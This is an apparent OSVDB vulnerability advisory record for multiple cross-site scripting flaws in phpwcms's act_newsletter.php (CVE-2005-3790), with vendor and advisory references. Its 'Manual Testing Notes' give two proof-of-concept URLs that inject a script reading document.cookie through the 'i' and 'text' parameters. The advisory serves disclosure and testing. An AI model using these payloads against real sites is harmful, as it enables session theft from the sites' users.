phpwcms act_newsletter.php Multiple Variable XSS

2005-11-14T02:16:10
ID OSVDB:20864
Type osvdb
Reporter OSVDB
Modified 2005-11-14T02:16:10

Description

Manual Testing Notes

http://[target]/phpwcms/include/inc_act/act_newsletter.php?i=V:target@target.com:<script>alert(document.cookie)</script>)

http://[target]/phpwcms/include/inc_act/act_newsletter.php?text=<script>alert(document.cookie)</script>

References:

Vendor URL: http://www.phpwcms.de/ Secunia Advisory ID:17590 Related OSVDB ID: 20862 Related OSVDB ID: 20863 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0182.html FrSIRT Advisory: ADV-2005-2452 CVE-2005-3790 Bugtraq ID: 15440